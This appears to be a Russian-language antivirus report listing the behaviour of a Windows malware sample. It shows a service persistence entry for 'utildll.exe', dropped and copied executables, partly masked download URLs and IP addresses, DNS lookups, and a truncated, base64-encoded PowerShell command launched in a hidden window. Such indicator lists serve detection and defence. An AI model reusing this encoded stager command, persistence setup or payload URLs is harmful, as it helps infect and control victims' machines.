Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\utildll] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\utildll] 'ImagePath' = '"%WINDIR%\SysWOW64\pidgenx\utildll.exe"'
- 'utildll' "%WINDIR%\SysWOW64\pidgenx\utildll.exe"
- 'utildll' %WINDIR%\SysWOW64\pidgenx\utildll.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAFIAVABHAEsAZwBvAHcAPQAnAEsASwBVAE8AVgBuAHoAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAYABSAEkAVABZAGAAUABSAE8AVABgAG8AYwBgAE8AbAAiAC...
- %HOMEPATH%\392.exe
- %WINDIR%\syswow64\pidgenx\utildll.exe
- %HOMEPATH%\392.exe в %WINDIR%\syswow64\pidgenx\utildll.exe
- '47.##6.117.214':80
- http://www.so####techno.com/wp-includes/pl0_sux_k2b4cgyr/
- http://ha##.net/wp-includes/o5kn_2i_4qtj9wg/
- http://47.##6.117.214/mNw4Xy7yK/QYxLSmMSoLkP/sGkxfjQseI/CaoKlretofx/TZDw9NhzYqhrrzE/AMBOEcSen/
- DNS ASK so####techno.com
- DNS ASK ha##.net
- '%HOMEPATH%\392.exe'
- '%WINDIR%\syswow64\pidgenx\utildll.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAFIAVABHAEsAZwBvAHcAPQAnAEsASwBVAE8AVgBuAHoAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAYABSAEkAVABZAGAAUABSAE8AVABgAG8AYwBgAE8AbAAiAC...' (со скрытым окном)